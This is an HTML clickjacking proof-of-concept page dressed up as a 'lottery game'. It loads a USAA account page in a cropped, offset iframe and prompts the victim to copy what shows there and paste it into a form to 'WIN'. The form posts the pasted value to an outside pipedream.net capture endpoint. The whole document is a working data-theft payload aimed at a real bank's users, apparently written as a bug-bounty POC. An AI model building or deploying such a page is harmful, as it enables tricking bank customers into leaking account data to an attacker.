
<!doctype html><html>
<title>ClickJacking Lottery Game POC</title>
<body><center>
<h1>ClickJacking Lottery Game</h1>

<b><p>Can you copy me ?</p><b>



<div qjid="quickjack" style="overflow: hidden; width: 304px; height: 38px; position: relative;" id="cksl6">
<iframe name="cksl7" src="https://rwww.usaa.com/my/usaa/?aklogin=true" style="border: 0pt none ; left: -875px; top: -8px; position: absolute; width: 1920px; height: 971px;" scrolling="no"></iframe></div>
&#8593; &#8593; &#8593; &#8593; &#8593; &#8593; <br><br>
<b>Paste here to WIN :) <b>

<form action="https://en7luzjhm7ad7.x.pipedream.net" method="POST">  <label for="fname">First name:</label><br>
  <input type="text"  name="text" id="fname" value=""><br><br>

    <input type="submit" value="Submit">

  </form>

